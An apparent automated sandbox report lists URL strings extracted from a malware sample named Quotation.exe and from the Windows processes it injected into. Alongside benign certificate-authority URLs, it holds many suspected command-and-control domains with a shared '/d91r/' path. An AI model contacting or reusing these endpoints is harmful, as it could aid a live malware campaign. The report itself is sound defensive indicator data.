        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: explorer.exe, 0000000C.00000000.22676296155.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22652431593.000000000908A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26420764035.000000000908A000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: explorer.exe, 0000000C.00000000.22676296155.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24132035553.00000000105E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26446938222.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23170131736.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23187025355.00000000105E0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2r
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
        Source: Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, libpkcs11-helper-1.dll.1.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp | String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: Quotation.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: Quotation.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 0000000C.00000003.23174182850.000000000D00E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182957260.000000000D00E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26420764035.0000000008FFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26435807561.000000000D00E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D00E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D00E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22652431593.0000000008FFC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
        Source: explorer.exe, 0000000C.00000000.22676296155.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24132035553.00000000105E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26446938222.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22652431593.000000000908A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23170131736.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26420764035.000000000908A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23187025355.00000000105E0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.dr | String found in binary or memory: http://ocsp.digicert.com0N
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.dr | String found in binary or memory: http://ocsp.digicert.com0O
        Source: explorer.exe, 0000000C.00000000.22676296155.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24132035553.00000000105E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26446938222.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23170131736.00000000105DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23187025355.00000000105E0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
        Source: explorer.exe, 0000000C.00000000.22639249387.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26403643909.00000000004B9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr | String found in binary or memory: http://ocsp.thawte.com0
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
        Source: Quotation.exe | String found in binary or memory: http://s.symcb.com/universal-root.crl0
        Source: Quotation.exe | String found in binary or memory: http://s.symcd.com06
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr | String found in binary or memory: http://s2.symcb.com0
        Source: explorer.exe, 0000000C.00000002.26407630813.00000000022A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.22657835861.000000000A760000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.22656044134.0000000009560000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
        Source: explorer.exe, 0000000C.00000003.24127896554.000000000CB60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24122198106.000000000CB60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26429837319.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000CB5F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.microsoft.c
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr | String found in binary or memory: http://sv.symcb.com/sv.crl0f
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr | String found in binary or memory: http://sv.symcb.com/sv.crt0
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr | String found in binary or memory: http://sv.symcd.com0&
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://trade.webnames.ru
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://trade.webnames.ru/img/og_image.png
        Source: Quotation.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
        Source: Quotation.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
        Source: Quotation.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.184411.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.184411.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.184411.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.184411.comwww.b-tek.media
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aznqmd.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aznqmd.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aznqmd.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aznqmd.comwww.cactus-market.ru
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aznqmd.comwww.texasgent.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.b-tek.media
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.b-tek.media/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.b-tek.media/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.b-tek.mediawww.dexmart.xyz
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brightfms.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brightfms.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brightfms.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014FA0000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000006600000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.brightfms.com/d91r/?6SE=F8zFuLn&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJK
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.brightfms.comwww.eta-trader.net
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.buymyenergy.comwww.184411.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cactus-market.ru
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cactus-market.ru/d91r/
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cactus-market.ruwww.qx386.top
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cardinialethanol.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cardinialethanol.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cardinialethanol.comL$www.flaviosilva.online
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cardinialethanol.comwww.flaviosilva.online
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.decoraptor.store
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.decoraptor.store/d91r/
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.decoraptor.store/d91r/_w7xz=bR5Glu
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexmart.xyz
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexmart.xyz/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexmart.xyz/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dexmart.xyzwww.finelinetackdirect.com
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eta-trader.net
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eta-trader.net/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eta-trader.net/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eta-trader.netwww.funvacayflorida.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.finelinetackdirect.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.finelinetackdirect.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.finelinetackdirect.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.finelinetackdirect.comwww.maxhaidt.com
        Source: explorer.exe, 0000000C.00000002.26447616081.0000000011109000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flaviosilva.online
        Source: explorer.exe, 0000000C.00000002.26447616081.0000000011109000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flaviosilva.online/d91r/
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.flaviosilva.onlinewww.solya-shop.com
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funvacayflorida.com
        Source: control.exe, 0000000D.00000002.26417273951.0000000007370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.funvacayflorida.com/?fp=dj8phrx%2FM7zn2%2BQxIl96VISg%2BlRAUkJF1tnEn7z1%2BPsRxvfaRVW9F5TaX
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funvacayflorida.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.funvacayflorida.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ghostdyes.net
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ghostdyes.net/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ghostdyes.net/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ghostdyes.netwww.aznqmd.com
        Source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: Quotation.exe, 0000000A.00000001.21847480465.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
